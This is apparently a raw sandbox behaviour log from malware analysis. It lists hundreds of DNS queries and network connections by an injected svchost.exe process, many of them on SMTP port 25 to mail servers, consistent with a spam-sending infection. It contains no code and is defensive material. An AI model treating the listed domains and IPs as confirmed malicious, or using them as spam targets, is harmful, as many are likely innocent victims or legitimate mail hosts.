              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.196.25 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.cokocoko.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.107 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 141.193.213.20 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.medius.si
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.53.77.146 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cnti.krsn.ru
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.217.118.81 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.owsports.ca
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.59 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yocinc.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.31.143.1 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cyclad.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.146.154 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.synetik.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.27.205 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.90.244.158 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.181.113 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.218.88.159 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.122.205 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.201.52.102 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.94.41.167 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.218.88.167 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.221.29 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.76.140 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.13 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.91.197.46 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.8.8.200 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.220 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.0.97.108 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnsds.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hubbikes.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ka-mo-me.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.160.168 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.251.116 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.31.76.90 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.206.199 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ottospm.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.19.116.195 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.167.255.150 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.21.93.239 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.113.204.223 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 109.71.54.22 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: adventist.ro
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 145.239.5.159 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.railbook.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 78.46.224.133 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: akr.co.id
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.55.151 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.75 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 72.251.233.245 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.clinicasanluis.com.co
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.32.21 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 156.251.140.23 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.findbc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 61.200.81.21 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.97.62 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.68.7 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.24.39 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.233.160.146 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.50 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.217 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.221 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.201.225.123 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.c9dd.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.vitaindu.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.121 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.8.75 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.reglera.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.usadig.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.169.145.175 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: anduran.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kursavto.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.4.16.43 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.52.126 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.3.246.178 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.205.242.146 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 86.105.245.69 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.170.222 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.153.27 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.140.52 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.153.26 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
